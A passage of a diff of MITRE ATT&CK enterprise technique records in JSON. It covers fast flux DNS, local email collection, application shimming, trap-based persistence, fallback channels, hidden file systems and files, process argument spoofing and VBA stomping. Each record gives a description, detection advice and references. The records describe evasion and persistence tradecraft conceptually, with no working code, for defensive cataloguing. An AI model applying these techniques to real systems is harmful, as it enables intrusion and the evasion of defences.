These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568/001", + "external_id": "T1568.001" + }, + { + "source_name": "MehtaFastFluxPt1", + "description": "Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref" + }, + { + "source_name": "MehtaFastFluxPt2", + "description": "Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref" + }, + { + "source_name": "Fast Flux - Welivesecurity", + "description": "Albors, Josep. (2017, January 12). Fast Flux networks: What are they and how do they work?. 
Retrieved March 11, 2020.", + "url": "https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:09.378000+00:00\", \"old_value\": \"2025-04-15 19:58:16.171000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-19 18:46:06.098000+00:00", + "modified": "2025-04-25 14:46:00.964000+00:00", + "name": "Local Email Collection", + "description": "Adversaries may target user email on local systems to collect sensitive information. 
Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1114/001", + "external_id": "T1114.001" + }, + { + "source_name": "Outlook File Sizes", + "description": "N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and OST File Sizes. Retrieved February 19, 2020.", + "url": "https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/" + }, + { + "source_name": "Microsoft Outlook Files", + "description": "Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020.", + "url": "https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Access", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather local email files. 
Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:00.964000+00:00\", \"old_value\": \"2025-04-15 19:58:12.090000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1041: Encrypt Sensitive Information", + "M1060: Out-of-Band Communications Channel" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0017: Command (Command Execution)", + "DS0022: File (File Access)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-24 14:56:24.231000+00:00", + "modified": "2025-04-25 14:46:29.459000+00:00", + "name": "Application Shimming", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. 
For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. 
(Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/011", + "external_id": "T1546.011" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "FireEye Application Shimming", + "description": "Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved May 4, 2020.", + "url": "http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf" + }, + { + "source_name": "Black Hat 2015 App Shim", + "description": "Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. 
Retrieved June 22, 2017.", + "url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification", + "Module: Module Load", + "Windows Registry: Windows Registry Key Modification", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:29.459000+00:00\", \"old_value\": \"2025-04-15 19:58:26.274000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1051: Update Software", + "M1052: User Account Control" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0017: 
Command (Command Execution)", + "DS0022: File (File Modification)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-24 14:17:43.906000+00:00", + "modified": "2025-04-25 14:46:52.100000+00:00", + "name": "Trap", + "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/005", + "external_id": "T1546.005" + }, + { + "source_name": "Trap Manual", + "description": "ss64. (n.d.). trap. Retrieved May 21, 2019.", + "url": "https://ss64.com/bash/trap.html" + }, + { + "source_name": "Cyberciti Trap Statements", + "description": "Cyberciti. (2016, March 29). Trap statement. 
Retrieved May 21, 2019.", + "url": "https://bash.cyberciti.biz/guide/Trap_statement" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Creation", + "Process: Process Creation", + "Command: Command Execution", + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:52.100000+00:00\", \"old_value\": \"2025-04-15 19:58:36.056000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:30:21.689000+00:00", + "modified": "2025-04-25 15:16:21.879000+00:00", + "name": "Fallback Channels", + "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain 
reliable command and control and to avoid data transfer thresholds.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1008", + "external_id": "T1008" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:21.879000+00:00\", \"old_value\": \"2025-04-15 19:59:20.736000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-28 22:55:55.719000+00:00", + "modified": "2025-04-25 14:48:18.639000+00:00", + "name": "Hidden File System", + "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. 
In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/005", + "external_id": "T1564.005" + }, + { + "source_name": "MalwareTech VFS Nov 2014", + "description": "Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.", + "url": "https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html" + }, + { + "source_name": "FireEye Bootkits", + "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html" + }, + { + "source_name": "ESET ComRAT May 2020", + "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf" + }, + { + "source_name": "Kaspersky Equation QA", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). 
Equation Group: Questions and Answers. Retrieved December 21, 2015.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification", + "File: File Modification", + "Windows Registry: Windows Registry Key Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:18.639000+00:00\", \"old_value\": \"2025-04-15 19:59:14.404000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0001: Firmware (Firmware Modification)", + "DS0022: File (File Modification)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + 
"id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-26 17:46:13.128000+00:00", + "modified": "2025-04-25 14:48:27.868000+00:00", + "name": "Hidden Files and Directories", + "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. 
For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/001", + "external_id": "T1564.001" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. 
Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "File: File Creation", + "File: File Metadata", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:27.868000+00:00\", \"old_value\": \"2025-04-15 19:59:19.293000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-11-19 14:13:11.335000+00:00", + "modified": "2025-04-25 14:48:40.519000+00:00", + "name": "Process Argument Spoofing", + "description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. 
Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/010", + "external_id": "T1564.010" + }, + { + "source_name": "Microsoft PEB 2021", + "description": "Microsoft. (2021, October 6). PEB structure (winternl.h). 
Retrieved November 19, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb" + }, + { + "source_name": "Xpn Argue Like Cobalt 2019", + "description": "Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.", + "url": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/" + }, + { + "source_name": "Cobalt Strike Arguments 2019", + "description": "Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.", + "url": "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/" + }, + { + "source_name": "Nviso Spoof Command Line 2020", + "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.", + "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/" + }, + { + "source_name": "FireEye FiveHands April 2021", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html" + }, + { + "source_name": "Mandiant Endpoint Evading 2019", + "description": "Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. 
Retrieved November 29, 2021.", + "url": "https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:40.519000+00:00\", \"old_value\": \"2025-04-15 19:59:25.123000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-17 12:51:40.845000+00:00", + "modified": "2025-04-25 14:48:00.627000+00:00", + "name": "VBA Stomping", + "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero\u2019s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. 
